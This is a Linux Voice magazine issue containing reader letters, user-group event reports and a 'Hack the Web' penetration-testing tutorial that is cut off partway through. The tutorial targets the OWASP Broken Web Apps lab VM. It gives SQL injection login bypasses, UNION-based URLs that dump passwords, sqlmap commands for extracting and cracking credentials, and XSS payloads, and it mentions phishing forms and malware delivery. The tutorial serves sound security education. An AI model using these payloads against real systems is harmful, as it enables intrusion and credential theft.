            desktop connection through any          Yes, you’re quite right that we should
            HTML 5 browser window and can           cover it, and get it up on the internet
            proxy VNC and RDP connections           as CC-BY-SA as soon as possible. As
            too. It looks like a potentially very   for Guacamole, it looks interesting.
            handy technology but maybe a bit        Hmmm…




            We haven’t had
            the chance to test
            Guacamole, but
            that appears to be
            a Linux desktop
            running inside a
            browser. The cloud
            can now proclaim
            eternal victory!


14
                                                                                                                                      MAIL



BUYING LINUX                                                                                                                If you begrudge paying
                                                                                                                            Microsoft for an
MACHINES                                                                                                                    operating system that
I read with interest your article                                                                                           you’re just going to
on buying Linux computers and I                                                                                             delete, Check out
wish that I had access to it before                                                                                         www.pcspecialist.co.uk.
I bought my recent machine, as
it would’ve saved me a lot of my
own research. However, I should
like to point out that there are
Linux PC vendors in Europe, and
in particular I would draw your
readers’ attention to a German
site; linux-onlineshop.de. I too
had looked at US vendors, such
as System76, and had concluded
that VAT and import duties made
this an unattractive proposition.
The German site offered
configurable modern machines
and the protection of EU consumer
legislation: much more attractive.
   Unfortunately, the site is only
available in German (no translation
available) but my Secondary
School German and judicious
use of Google Translate where I        with Linux-onlineshop. They offer          she loves it because it has Scratch
really didn’t understand the small     some good machines, ready to go,           and Python and the desktop
print managed to secure an order       but buyers need to know that the           looks similar to the Raspberry Pi!
and the machine arrived, well          power supply will have a European          Without your review I doubt that
packaged, in eight days exactly        plug. This is easily cured with            this distribution would have gained
as specified. Linux Onlineshop         a UK visitor’s adaptor, available          my attention.
had installed Linux Mint for me        from high-street camping shops               Keep up the good work and I
and had even set up separate           or electronics retailers. I mention        look forward to Issue 4!
partitions for root and /home.         my experience for your readers,            Mike
Although I’m not a complete Linux      so that they might explore options
novice, I didn’t know enough           that don’t involve them paying ‘the        Ben says: Yes! Thanks Mike. It’s also
about UEFI and Secure Boot at          Windows tax’.                              worth taking a look at PC Specialist,
the time to consider installing it        I’d like to thank you for the           a firm based right here in Ye Merry
on a modern machine myself and         review of SolydXK in issue 2. I’d          Englande. It’s where I got my machine
it was useful to be able to buy        been looking for a solution to             from, and as with linuxonlineshop.de,
a Haswell machine with Linux           install on an old Intel Atom net-          you don’t have to pay for a pointless,
pre-installed. Even though I’ve        book for my nine-year-old niece. I         useless Windows licence to get a
since got to grips with installing     installed SolydXK for her because          machine that you’re only ever going to
with UEFI, I’m pleased that I dealt    it doesn’t need re-installation and        use as a Linux box.



CONCERNED OF THE INTERNET
Is it true that Facebook is planning   – there are no public shares, so the       may be another way. With that kind of
to buy Canonical? If so I will         only way for Canonical to be sold          money, Facebook could possibly lure
change distributions just for my       to anyone would be for a certain           him onto some spacecraft claiming it
privacy alone. http://itsfoss.com/     Mr Shuttleworth to sell it to them.        was headed for the ISS. Once in orbit
facebook-to-buy-ubuntu-for-3-          Since he already bemonikers himself        they could imprison him in one of the
billion                                SABDFL (Self Appointed Benevolent          no-doubt dozens of brainwashing
Steve Cox                              Dictator For Life) it seems that the       satellites they already have up there
                                       company would have to be wrestled          and compel him to name an upcoming
Nick ‘Mouth of Sauron’ Veitch says:    from his cold, dead hands. However, if     release “Zazzy Zuckerburg”. Still, this
Canonical is not a listed company      billions of currency are at stake, there   seems unlikely.



                                                              www.linuxvoice.com                                                                15
     LUGS ON TOUR




LUGS ON TOUR
Manchester Girl Geeks
Liz Hardwick Girls, geeks and crowdsourced cake


B
         eing a woman who works             at Manchester Girl Geeks’ largest
         in technology normally             ever event. Some talks included
         means you’re the only girl         Data and Healthcare, Social Media
geek in the room. Manchester Girl           for Positive Change, Quantified Self
Geeks Barcamp was organised                 and a strand of women in science
to help redress that balance                and tech talks from our venue
and give women the confidence               hosts, The Institute of Humanities
and supportive environment to               and Social Science Research.
attend possibly their first geeky              My personal favourites from the
conference. It’s always been                talk lineup came from @Jarofgreen
important to me to support women-           on OpenCal, an open source online
friendly events rather than women-          calendar for groups and events, and
only, that’s what @mcrgirlgeeks is          @DefProc, who shared Internet of
all about.                                  Toys with us, along with @Bubblino
   A team of four of us girl geeks          who got a mention.
set about organising the second,
affectionately named #bracamp               Atmosphere
back in January, and saw over               As a speaker at various events
100 attendees of all genders fill           around the UK, it’s easy to feel when
the Geoffrey Manton building at             the atmosphere is right. Everyone
                                                                                        The cake/death conundrum gets easier every time. Look at these
Manchester Metropolitan University          on the day was positive, buzzing
                                                                                        entries for the #bakeoff cake competition – Photo by Zoe E Breen.
on 31 May.                                  and chatting with each other. There
   It was a full day of “un-                were friends being made, contacts                                       and share their projects with the
conference” talks (where attendees          being swapped and newbies doing                                         attendees. We had The Raspberry
set the topics), networking, and            their first ever talks. There was a                                     Pi Foundation and Manchester
sometimes the most important                mix of geeks, event organisers, non-                                    Raspberry Jam, the fabulous
things… brews and cake… lots of             geeks and others just interested in                                     ScienceGrrl, and the hacking-all-
cake… crowdsourced cake at that!            learning new things. There was a                                        the-things HacMan (Manchester’s
   Manchester Girl Geeks regularly          great vibe, and I would recommend           The team (l–r):             Hackspace).
runs dinners and afternoon tea              to anyone join.                             Liz Hardwick, Sam              A massive thanks to them, and
parties with different STEM themes,            We also got some brilliant               Headleand, Katie            all our sponsors, but most of all
and some of these topics were seen          community groups to come                    Steckles, Angie Chan.       the attendees, who made it such
                                                                                                                    an awesome event. Hopefully it
                                                                                                                    goes some way into helping people
                                                                                                                    realise that girls can be geeks too!
                                                                                                                    For more info on Manchester Girl
                                                                                                                    Geeks, check out the website at
                                                                                                                    http://manchester.girlgeekdinners.
                                                                                                                    com


                                                                                                                      TELL US ABOUT YOUR LUG!
                                                                                                                      We want to know more about your
                                                                                                                      LUG or hackspace, so please write
                                                                                                                      to us at lugs@linuxvoice.com and
                                                                                                                      we might send one of our roving
                                                                                                                      reporters to your next LUG meeting
A sea of purple t-shirts - Attendees listen to the opening plenary – Photo by Liz Hardwick


16                                                                 www.linuxvoice.com
                                                                                                                          LUGS NEWS



Cambridge Raspberry Jam
Talks and demos and workshops, oh my! By Michael Horne & Tim Richardson.


T
         he Cambridge Raspberry        included: an introduction to basic
         Jam on 10 May was a           Pi electronics, soldering, sensors,
         pretty epic event. Back       programming an Arduino, the
in May last year, we started out       PiCamera, the Pibrella and robotics
with 50 people in one room, and        concepts such as motor control,
now we’ve grown to be the largest      line following and distance sensing,
regular Jam in the country (possibly   plus two Minecraft sessions.
the world!) with approximately 200
people attending at the Institute of   Pi-powered kit
Astronomy.                             We also had a show-and-tell
   This Jam was very special. We       area featuring projects including:
dedicated our lecture theatre to       an Easter Bunny chocolate egg
one thing: Focus on Education.         dispenser, a Pi-powered Oculus
We invited educators to attend         Rift, a prototype of a new robotics
12 sessions showcasing the use         kit called Pi2Go and some
of the Raspberry Pi in education,      fantastic projects from schools
kicked off by Clive Beale from the     – a greenhouse watering system
                                                                                                                          Fittingly for an
Raspberry Pi Foundation. Topics        and a robot arm that followed the          For a full report of the event,
                                                                                                                          education-focused event,
included: the new curriculum, STEM     movements of a real arm.                including videos of most of the            there were lots of kids in
Ambassadors, Code Club, Sonic             This was all topped off by our       talks, visit http://camjam.me/             attendance.
Pi, FUZE and Basic, the Pibrella,      marketplace area featuring vendors      May2014.
Minecraft, the Computing at School     both long-standing and brand-new.          Forthcoming CamJams are on
organisation, Seven Segments of Pi        At the end of the day, we were       5 July, 6 September and 6
and general talks on how to inspire    surprised at how smoothly it had        December, which will feature a
the next generation of computer        all gone and how few crises there       robotics competition we’re calling
scientists.                            were. We received some stunningly       PiWars! For more details, please
   At the same time, we ran            good feedback and people                visit our website at http://camjam.
10 practical workshops which           genuinely seemed to enjoy the day.      me and sign up to our mailing list.



OwnCloud gets its own contributor event
Need an excuse to visit Berlin this August? Jos Poortvliet has the perfect one.


W
            ith recent revelations     existing and prospective OwnCloud
            about the NSA – and        contributors a place to get together
            others – tracking          to get work done. Lightning talks,
data, OwnCloud has become a            workshops and keynotes give
fast-growing alternative to things     everyone the opportunity to share
like Dropbox and Google Docs,          what’s going on in OwnCloud and
with close to 2 million users. With    learn new skills. We are looking
Owncloud users don’t store their       for hardcore programmers but
data on some third-party, hackable     also documenters, translators
storage – the data resides on their    and testers who are invested in
own hardware.                          protecting their – and others’ –
                                       privacy. The hackathon will take
Everyone welcome                       place from 26–31 August, with an
Crucial to OwnCloud’s ability          added conference day on Saturday
to appeal to so many users is          30 August that will feature lightning
the open source community of           talks and workshops for beginners       Help contribute to the best alternative to Google’s hegemony.
contributors that works hard to        and new contributors as well as
add OwnCloud features. For the         more advanced subjects.                 than double that number this year.
third straight year, OwnCloud will        Last year, the hackathon at          The event is free but we ask people
be hosting a Hackthon – same           TU Berlin attracted around 50           to register at
as last year, at TU Berlin – to give   contributors, and we expect to more     http://conference.owncloud.org.



                                                            www.linuxvoice.com                                                                  17
     FEATURE HACK THE WEB




           The best way to defend yourself on the web is to know how
            the enemy works. Learn to hack the web, and keep your
                server safe from the dodgy side of the internet.




            Hack safely – do it on VirtualBox

            The most valuable tool in the aspiring penetration tester’s             Because the virtual machine is riddled with vulnerabilities,
            arsenal is a good set of practice sites. These are websites that    it’s a good idea to make sure it’s not accessible from other
            have known vulnerabilities that you can explore to find where       computers. The easiest way of doing this is with host-only
            problems are likely to lie.                                         networking. This is a virtual computer network that runs on
               There are quite a few out there, and the Open Web                the host (ie your PC or laptop), and connects to the virtual
            Applications Security Project (OWASP) has gathered some of          machine without exposing it to the wider network. To set this
            the best ones together in the Broken Web Applications Project       up, right-click on the virtual machine you’ve just created, and
            (OWASP-BWA) which is a virtual machine file available from          select Settings, then go to Network and change Attached To to
            http://sourceforge.net/projects/owaspbwa.                           Host Only Adapter.
               If you unzip it (depending on your distro, you many need to
            install software that can handle 7z files), you’ll get a new        A vulnerable virtual machine
            directory containing the files needed for a virtual machine.        You now have a vulnerable machine that you can hack away at
               VirtualBox is the easiest tool for creating a simulated          without exposing yourself to other computers on the network.
            computer that you can hack into. It’s in most distro’s              After you boot it up, you’ll end up at a login screen. This will tell
            repositories. Once VirtualBox is installed, open it and click New   you the URL you need to point your browser to in order to
            to create a new machine. Give it a name, and set it as Linux,       access the vulnerable web apps. In our case it was
            Ubuntu. Hit Next twice to accept the default amount of              http://192.168.56.101, but it may be different on your
            memory. On the Virtual Hard Disk screen, select Use Existing        machine.
            Hard Disk, then use the directory icon to find the file OWASP          There’s loads of really good stuff on the virtual machine, but
            Broken Web Apps-cl1.vmdk that you unzipped previously.              we’re going to look at just a few bits to get you started. We
            Click through Next, and then Create to finish the Virtual           strongly encourage you to take more of a look around as
            Machine. It should now be ready to start.                           there’s loads of fun things to try and break into.




18                                                               www.linuxvoice.com
                                                                                                        HACK THE WEB FEATURE


Exploit SQL
You don’t need a password to log in when you’ve got 1337 skillz.
The first application we’re going to look at is
called Bricks. It’s a simple web app with a
few examples to demonstrate some of the
basic techniques. Go the URL given on the
login screen of your virtual machine, then
click on OWASP Bricks. The app consists of
a series of bricks that each pose a challenge
to the aspiring web app hacker. They’re split
into three categories (login, file upload and
content) that each tests different skills sets.
To start with, we’re going to take a look at
bypassing login forms. Go to Bricks > Login
Pages > Login #1.
    You’re presented with a fairly standard
login page that requests a username and
password. First, just to see what’s going on,
enter the username and password test/test.
This won’t log you in (those credentials are
wrong), but the fail login page will show you
the SQL query used to verify the password.
    Even though most websites don’t show
you the SQL they use to check the login,
most password checks on websites work in
roughly the same way. That is, when you
enter your credentials, the system checks to      By manipulating some SQL, you can log into a site without having to use a password.
see if they match a row in the database. If
they do, then it logs you in (the password        where the name is ‘test’ (this will probably           The Login #2 brick includes some
should be hashed, but as you will see, that       not match anything) or the name is like ‘%’        JavaScript to check what the user entered
won’t make a difference in this case).            (in SQL this matches every string, so every        before it sends it to the server to perform the
    To log in, we don’t necessarily have to       row will be returned) or both ‘1’=’1’ (this is     log in attempt. Go to that brick now, and we’ll
enter valid credentials, we just have to enter    always true, but it’s only included to use up      try to break in. You should find that if you
details that result in this SQL returning one     the remaining quote mark that will be added        enter the same data as before, you get an
or more rows.                                     after the username field) and the password         error message rather than a successful
    The system is simply dropping the             is ‘test’ (this may or may not return any          login. When you request a web page, what
username and password we enter into the           rows, it doesn’t matter).                          you’re actually doing is sending an HTTP
SQL surrounded by quote marks. A simple                                                              GET request. This is how your browser tells
way to check if you can manipulate the SQL        Validate your data!                                the server which page it wants. Almost all
is by entering the username: test’ (with just     The crucial part of the code that’s returned is    the information for the GET request is in the
the one quotation mark) with any password.        name like ‘%’. This wildcard match brings          address of the page you ask the server for
If the website isn’t stripping special            back every row, because it’s surrounded by         (there’s also the HTTP header and the cookie
characters out, this will result in an SQL        ors. Even though we have no idea what the          that can also be exploited by hackers, but we
error, because there will be the wrong            username or password are, we’ve still been         won’t use them here).
number of quote marks in the query.               able to log in. Obviously this is a fairly             There are also HTTP POST requests.
    This means we can close off the quotes        serious problem, and to make sure your             These have extra little packets of data that
and inject our own SQL into the statement.        login forms don’t fall victim to this sort of      are sent along with the address. Either way,
For example, if you enter the username: test’     attack, you need to validate the data the user     it’s still data being sent from our computer,
or name like ‘%’ or ‘1’=’1, the server will       enters to make sure it doesn’t contain             and so we can control it. Ordinary web
execute the following query:                      malicious code.                                    browsers send POST requests as instructed
SELECT * FROM users WHERE name=’test’ or name
like ‘%’ or ‘1’=’1’ and password=’test’
  In MySQL, the and operator is run before
or, so this is equivalent to:
                                                  “Even though we have no idea what the username
SELECT * FROM users WHERE name=’test’ or name     or password are, we’ve still been able to log in.
like ‘%’ or (‘1’=’1’ and password=’test’)
This will return any entry in the database
                                                  Obviously this is a fairly serious problem!”

                                                              www.linuxvoice.com                                                                19
     FEATURE HACK THE WEB

by the web pages, and don’t have the ability
to manipulate them. This is exactly what’s
supposed to happen in the second login
brick. In this case, some Javascript running
on the web page tries to filter out our
malicious request if you attempt to break in
in the same way you did with the first login
form.
   However, while the data’s still on our
computer, we can still manipulate it as long
as we have the right tools for the job. The
simplest one is the Tamper Data extension
for Firefox. To get this, you’ll need to install
Firefox if you haven’t got it already, then go
to Tools > Addons and search for Tamper
Data. Once it’s installed, you’ll need to restart
Firefox.
   Navigate back to the Bricks Login #2, and
enter some dummy data into the form (we’ll                A good knowledge of obscure SQL is the best way to ensure you get the best information out of an
edit it in a minute), but before you click                SQL injection attack, as many sites will volunteer information that makes them vulnerable.
submit, start the Tamper Data session. Go
to Tools > Tamper Data and then click Start               to whatever you want. In this case, we’ll                tampered with. You can intercept and spoof
Tamper in the new window. This will then                  change the username to the same value as                 TCP and UDP packets in the same way we
intercept every HTTP request and give you                 before, that is:                                         just intercepted the HTTP request.
the opportunity to alter it. Now hit submit in            test’ or name like ‘%’ or ‘1’=’1                         Absolutely everything must be validated on
the main window, and a pop up will ask you                  You should now find you get logged in.                 the server before it’s used in any way that
if you want to tamper with the request. Click                                                                      could lead to a compromise.
Tamper. There are two sides to the dialog                 Validate your data!
window that opens. On the left hand side,                 There’s an important lesson here for any                 SQL Injection
you’ll see details of the HTTP request                    aspiring web developers: JavaScript form                 In the previous example, we managed to
header. These are all changeable, and in                  validation can be useful to help users enter             manipulate the SQL to get the server to log
some penetration tests, it can be useful to               the right data, but it has no security value             us in. This is a useful trick, but it’s not the
change them (particularly the User-Agent                  whatsoever. As you’ve just seen, it’s trivially          limit of the damage we can do with poorly
and the Cookie), however, we won’t use                    easy to bypass. This isn’t limited to text               validated SQL. If you go to Bricks Content
them. In this exercise, we only need to alter             inputs. We could have changed it just as                 #1, you’ll find another website that takes
the post data which is on the right hand                  easily had it been a drop-down box, check                input from the user and puts it in an SQL
side. Here you should see the username and                box, radio buttons, or any other form of                 query, but this time information is returned
password fields that you entered in the form.             input. This also isn’t limited to just websites.         to the user.
Since these have already gone past the                    Whenever you accept data over a network,                    The intended use of this web page is to
JavaScript checking, you can change them                  you can never be sure whether it’s been                  find out information about users on the
                                                                                                                   system, but since the data is poorly
                                                                                                                   validated, we can manipulate it to give us
  Hacking, cracking and penetration testing
                                                                                                                   almost anything we want.
  Hacking is without a doubt the most common word         This additional meaning offends some people who
                                                                                                                      The underlying code performs an SQL
  for breaking electronic security. It’s widely used in   feel that the term ‘cracker’ should be used instead.
  the mainstream media and within the hacking                 Cracking’s only common modern usage in a             select statement to grab one line of data
  community itself. Some people feel that this is         similar context is to break a single layer of security   from the database, then display three items
  counterproductive, and that the word should be          (eg to crack DRM). Some people feel it should be         from that line on the screen. To subvert this,
  reserved for less controversial technological uses.     used more widely to describe computer criminals,         we’ll use SQL’s union function to add extra
  In fact, the word appears to have originated in the     but that’s never caught on in mainstream use.
                                                                                                                   data we want. The union function simply
  Tech Model Railway Club at the Massachusetts                Penetration testing (or pen testing) is a type of
  Institute of Technology (MIT). From there it            systems testing that focuses on security. It’s           concatenates two tables to make one large
  emerged into the new world of computing to mean         where people try to find and fix weaknesses before       one that includes all the elements from both
  someone who uses particular knowledge and skill         they’re exploited by bad guys. However, the term         tables (or two queries). The only restriction
  to solve a challenging technical problem. It still      doesn’t solve the nomenclature problem, because          we face is that the two tables must have the
  retains this meaning, and you’ll often hear people      it only refers to people using their skills for good.
                                                                                                                   same number of columns, so our first task is
  referred to as (for example) “kernel hackers”               Language is organic, and a word’s etymology
  because they apply their technical skill to making      doesn’t define its current meaning. There are            to find out how many columns are returned
  the Linux kernel work better.                           certainly dialects of English were the word hacker       by the first select statement.
     Over time, the word has retained its original        means something different, particularly those               We can find this out by using an order by
  meaning, but it’s also come to mean someone who         spoken around Silicon Valley and MIT. However, in        operation. This can take a column number
  breaks into computers. This can either be for good      modern British English, it means someone who
                                                                                                                   as an argument and sort the data by that
  (white-hat hacker) or for evil (black-hat hacker).      subverts computer security.
                                                                                                                   column. If we put in a number that’s larger



20                                                                       www.linuxvoice.com
                                                                                                                    HACK THE WEB FEATURE


  SQL
  The vast majority of websites store information in    select name from users where id=1;                      %, and the group_concat() function. If you’re
  relational databases. In these, data is stored in         This statement tells the database that you want     interested in web application security, it’s essential
  tables, where each chunk of data is a row in the      all the values from the column name in the table        that you get a good grounding in SQL. There are
  table. Structured Query Language (SQL) is the most    users where id (which is the name of another            some great resources on the web to help you learn.
  common tool for extracting information from a         column) is 1. This is a very simple example. Almost     SQL Zoo is a good place to start (http://sqlzoo.net/
  relational database. It’s a nuanced language, and     all select queries have the same basic structure, but   wiki/Main_Page), and Schemaverse (https://
  true mastery of it can take a long time, but in the   there’s a lot more that can go in than simple           schemaverse.com – an online game where you
  most basic form of SQL, data is retrieved via a       columns, tables and conditions, and you’ll see a few    compete entirely in SQL) is a good place to practice
  select statement such as:                             more examples in this article such as the wildcard      your skills.


than the number of columns in the data, it’ll           User name: 2                                            http://192.168.56.101/owaspbricks/content-1/index.
throw an error, and we can use this error to            E-mail: 3                                               php?id=-1 union select (SELECT GROUP_
deduce the number of columns. We know                      This tells us that the page is displaying the        CONCAT(password) FROM users), (SELECT GROUP_
there are at least three because the user ID,           first three of the eight columns.                       CONCAT(name) FROM users), (SELECT GROUP_
username and email address are displayed                                                                        CONCAT(idusers) FROM users),4,5,6,7,8
on the screen, so we can start by entering              Target acquired                                           In a secure system, the passwords would
the URL:                                                Now we know the format of the data we                   be hashed, so wouldn’t be available in plain
http://192.168.56.101/owaspbricks/content-1/index.      need, we can start to use this to retrieve data         text. This is not a secure system for many
php?id=0 order by 3                                     from the database. Since we can only                    reasons.
  This doesn’t return any errors (we were               retrieve one line at a time, we need to be able
just checking that it worked). You now have             to squeeze as much information into that                Going automatic
to increase the number 3 to find out the                line as possible. That’s why we’re going to             The only limits to the number of things you
point at which it errors. So try:                       use the group_concat() MySQL function,                  can do is the permissions of the database
http://192.168.56.101/owaspbricks/content-1/index.      which can create a single string out of many            user, and your SQL skills. In order to make it
php?id=0 order by 3                                     values. For example, to return all the column           really easy to manipulate this sort of SQL
http://192.168.56.101/owaspbricks/content-1/index.      names in a particular table as a single string,         injection, many people use tools to
php?id=0 order by 4                                     you can use:                                            automatically perform these attacks. One of
http://192.168.56.101/owaspbricks/content-1/index.      select group_concat(column_name) from                   the best is sqlmap, which is available from
php?id=0 order by 5                                     information_scheme.columns where table_name =           www.sqlmap.org. If you download and
  And so on. You should find that it throws             ‘users’;                                                unzip this, you’ll find a Python script called
an error when you get to nine. This means                 In our URL format, this is:                           sqlmap.py.
that there are eight columns in the data, so            http://192.168.56.101/owaspbricks/content-1/index.         To test a website for SQL injection, you
whatever we union with the data should                  php?id=-1 union select (select group_                   only need to pass it the URL. For example
also have eight columns. To test this out, try:         concat(column_name) from information_schema.            run the following in a terminal in the new
http://192.168.56.101/owaspbricks/content-1/index.      columns where table_name = ‘users’) ,2,3,4,5,6,7,8      directory created by sqlmap:
php?id=-1 union select 1,2,3,4,5,6,7,8                     This isn’t quite perfect, because it will            python sqlmap.py -u “http://192.168.56.101/
  We entered -1 as the id because we don’t              repeat the values, but it does contain all the          owaspbricks/content-1/index.php?id=0”
want the original query to return any data.             information we need. We can now use                     When it asks you questions, you can just hit
Since the website only displays one line, we            exactly the same trick to retrieve all of the           Enter to accept the defaults.
want to make sure that our one line is                  values of any three columns from the table.                After it finishes running (it may take a little
displayed. The page should display:                     For example, to get the passwords,                      while), it should tell you that the parameter
User ID: 1                                              usernames and user IDs, try the URL:                    id is injectable. The real power of SQLmap
                                                                                                                isn’t in detecting SQL injection possibilities,
                                                                                                                though, but in exploiting them. For example,
                                                                                                                to get the username and passwords of all
                                                                                                                database users, run:
                                                                                                                python sqlmap.py -u “http://192.168.56.101/
                                                                                                                owaspbricks/content-1/index.php?id=0” --users
                                                                                                                --passwords
                                                                                                                  This will retrieve the usernames and
                                                                                                                hashed passwords, then perform a
                                                                                                                dictionary attack to retrieve the plain text
                                                                                                                passwords (this only works on poor
                                                                                                                passwords). Alternatively, to just dump all of
                                                                                                                the data into a text file for later perusal, try
                                                                                                                the following:
                                                                                                                python sqlmap.py -u “http://192.168.56.101/
The Tamper Data extension for Firefox lets you control the data you upload, and so bypasses all                 owaspbricks/content-1/index.php?id=0” --batch -a >
client side-security – so make sure you validate all user input on the server side!                             /home/ben/database.txt



                                                                       www.linuxvoice.com                                                                                21
     FEATURE HACK THE WEB


Automatic vulnerability scanning
Why hack manually when you can automate it?
So far, we’ve looked at how to exploit
vulnerabilities that we’ve known existed, but
we haven’t looked at how to find them.
Practice and experience help this quite a lot,
but there are also some tools that can make
the job easier. One of the most useful for
penetration testing is an attack proxy. This is
an HTTP proxy that acts as an intermediary
between your web browser and the websites
you’re looking at. It intercepts the requests
you make, and logs the responses that you
get from the server. In doing this, it helps you
keep a record of what you’ve done, and what
vulnerabilities you’ve found. This is helpful
as you go along, and it also keeps evidence
of what you’ve done which you can present
to the owner of the website to show exactly
what the vulnerabilities are and how they          Zap has a powerful scripting engine that you can use to define new rules for the scans. These could
can be exploited.                                  be used to target specific classes of vulnerabilities or web apps.
  Our favourite attack proxy is the Zed
Attack Proxy (ZAP) created by OWASP. It            pointing to the right proxy, and hit refresh.       will bring up the details of the scan. Here you
isn’t included in many distro’s repositories,         As well as recording where you’re                can select the site. Next to the site, there’s
so you’ll need to download it from                 browsing, ZAP can spider a site to find all         an icon that looks a little like four sliders on a
http://code.google.com/p/zaproxy/wiki/             the pages. This should give you all the             mixing desk. If you click on this it’ll open the
Downloads. It’s written in Java, so you don’t      targets to attack. We only want to spider           Scan Policy window.
need to compile it; just unzip the TAR             Bricks (not all of the web apps on the distro),         Here you can tune how the scan runs. The
archive and run zap.sh with:                       so in the sites pane, highlight owaspbricks         first thing to do is turn down the scans for
tar -zxvf ZAP_2.3.0.1_Linux.tar.gz                 (under Sites > ip-of-virtual-machine), then         cross-site scripting. This is a type of
cd ZAP_2.3.0.1                                     right-click and select Spider Subtree.              vulnerability we’ll look at next, but if we leave
./zap.sh                                                                                               it to scan for that here, it’ll stop looking once
  This will start the proxy and open a             Automatic scanning                                  it finds them on particular pages and not
window showing the data between the web            Zap’s best trick is its ability to automatically    find the SQL vulnerabilities we’re looking for.
browser and the server, or at least it will once   scan for vulnerabilities. Using this feature,           Under Injection, change both Cross Site
you set up your browser to go through the          you can just point it at a website, set a scan      Scripting (Reflected) and Cross Site
proxy. In Firefox you can do this by going to      running and see where the security holes            Scripting (Persistent) to OFF/Low. Also
Edit > Preferences > Advanced > Network >          are. However, the problem with vulnerability        under Injection, you can change SQL
Settings and set it to Manual Proxy                scanners is that they aren’t as good as             Injection to Default/Insane. This will give it
Configuration, with the HTTP Proxy set to          experienced pen testers at finding problems,        the best chance of finding the vulnerabilities.
localhost on port 8080.                            and so while they’re a useful tool, they can’t          With this done, you can start the scan
  Anything you do in the browser will now          replace wisdom and experience when it               running by right-clicking on owaspbricks (as
be picked up and stored by Zap. Let’s go           comes to breaking in. Let’s see how well Zap        you did before), and selecting Active Scan
back to Bricks and see how it compares to          does when it comes to finding ways to break         Subtree. The scan isn’t very subtle. It just
our manual testing.                                into Bricks.                                        throws lots and lots of test data at the
  To get Zap to the right place, just point           Before we run the scan, it’s best to change      website to try and elicit a response. It’s this
your browser to Login #1 in the Bricks web         a few of the defaults to make sure it focuses       sort of scan that fills up the error logs on
app. If you switch back to Zap, some entries       on the SQL that we’re looking for. At the           most internet-facing webservers. It can take
should have appeared in the sites pane. If         bottom of the Zap window, there’s a series          a little while to complete (possibly over an
they haven’t, make sure your browser is            of tabs; the one we need is Active Scan. This       hour depending on the power of your
                                                                                                       computer), but it shouldn’t need any
                                                                                                       intervention, so you can leave it running. To
“Zap’s best trick is its ability to automatically scan                                                 see what stage it’s currently at, click on the
                                                                                                       Scan Progress icon in the Active Scan tab
for vulnerabilities. You can point it at a website, set                                                (this looks a bit like a oscilloscope).
it running and see where the security holes are.”                                                          When it finally finishes, it will flag up all the
                                                                                                       issues it finds. The colour of the flags



22                                                             www.linuxvoice.com
                                                                                                                  HACK THE WEB FEATURE


  At a glance: the Zap interface
  HTTP request
  The contents of the HTTP
  request that’s currently
  highlighted.


  Sites pane
  A list of all the contents
  that Zap is aware of.




  HTTP response
  The data that was
  returned by the request.




  Alerts tab                                   Active scan tab                                        Spider tab
  A list of all the vulnerabilities            Control the vulnerability                              Change the way Zap searches
  Zap has found.                               search.                                                for content on the site.



indicate the seriousness of the issue from          Alert. Using Zap as a data store means                     help secure an open source project as it
red (major problem) to yellow (minor                you’ve got a record that you can check                     would be if you’re an aspiring professional
problem) to blue (information). If you click on     against as the security bugs are being fixed.              penetration tester.
the Alerts tab, you should see all the issues       It also enables you to generate a report of all              Forced browsing, fuzzing and SSL
it’s found. In this case, it should find two SQL    the issues you’ve found (Report Menu >                     certificates are some of the most useful
injection errors (the ones from contents #1         Generate HTML Report). By keeping                          features that we haven’t been able to cover.
and contents #2).                                   everything together in this way, it’s easy to              Fortunately, the project is well documented,
                                                    remember what the problems are, and                        and there are guides to these features and
Humans are still useful                             whether they’ve been fixed. This is just as                more on the wiki at https://code.google.
It’s impressive that Zap has managed to find        important if you’re running some tests to                  com/p/zaproxy/wiki/Introduction.
a way into this site by itself, but it’s only
found two of the many vulnerabilities in
there. While there are more sophisticated
vulnerability scanners available, none of
them are perfect, so it’s important to pair
them with a real person, who can both check
for false positives and check for anything
that the scanner might have missed.
    Aside from the vulnerabilities, let’s look at
what Zap is telling us. When it spidered the
site, it did a good job of digging up all the
different files that were on the server. This
won’t necessarily be perfect (because there
may be files that aren’t linked to anything),
however, it’s a great starting point.
Essentially, it’s given you a list of everywhere
a vulnerability could exist.
    As you go through these manually, you
may find vulnerabilities that the scanner
missed. In these cases, Zap can still be
useful as a reporting tool. You can manually
create alerts by right-clicking on the HTTP         There’s a full list of all the known vulnerabilities in Mutillidae II. It’s quite long, but exploring them all is
request in the sites pane, then selecting New       an excellent step towards mastering the art/science of penetration testing.



                                                                  www.linuxvoice.com                                                                              23
     FEATURE HACK THE WEB


Cross-site scripting
Fool users into giving up valuable data.
There are loads of vulnerable projects on the
Broken Web Apps live distro, and all of them
are worth a look to help you improve your
web app hacking. However, one stands out
as having far more vulnerabilities to play
with than any of the others: Mutillidae II. The
design of this is focused on the OWASP top
10, which is an annual list of the 10 most
common web app vulnerabilities; if you can
work your way through all of the
vulnerabilities, you’ll have a good
understanding of most web security issues.
There are far too many for us to go through
them all here, but we will have a look at one
more: Cross Site Scripting (XSS).
   This is similar to the SQL injection attacks
we looked at in Bricks, but instead of
injecting SQL, we inject HTML (or, more
                                                         The BodgeIt store is riddled with vulnerabilites. See how you can exploit them to make money!
commonly, JavaScript). In doing so, we
aren’t attacking the site, but the visitors to
the site. For example, open the IP of the                the post data. The page visited is much                  other attacks we’ve done. After all, we
virtual machine in your browser, then go to              easier, as it just returns whatever you put in           haven’t been able to extract data from the
OWASP Mutillidae II, and in the left-hand                the page parameter in the URL.                           server. The point of this is to try to subvert
menu, select OWASP Top 10 > A2 Cross Site                   The most common way to check for XSS                  the visitors. This could be in a number of
Scripting > Persistent (Second Order) >                  is by inserting a JavaScript alert. This makes           ways. For example, you could insert a form
Show Log.                                                it easy to see if something’s been injected,             asking users to enter their usernames and
   This website is a simple log file viewer. It          because it pops up when you visit the page.              passwords that submits the data to your
shows a list of which people have visited                For example, if you browse to the site:                  site, or you could use it as a platform to
which pages, and when. None of this comes                http://192.168.56.101/mutillidae/index.php?page=<s       launch an attack that surreptitiously installs
directly from user input in the same way that            cript>alert(‘Hello’);<script>                            malware onto the unsuspecting browser. It
it did with the SQL attacks we did (though                 Now visit the log page. You should get a               could also include JavaScript to
there are certainly XSS attacks that work in             pop up saying “Hello”. For true internet                 automatically redirect the browser to
this way). Instead we have to get a little               points, though, you might want to try visiting           another site.
creative here.                                           the URL:                                                    This attack works because the web app
                                                         http://192.168.56.101/mutillidae/index.                  has a page parameter that takes the
Manipulate the users                                     php?page=<iframe width=1500 height=1000 src= “//         filename of the page they want to view. It
There are two pieces of data that we as a                www.youtube.com/embed/YSDOcLfwM-                         then surrounds this page with the header
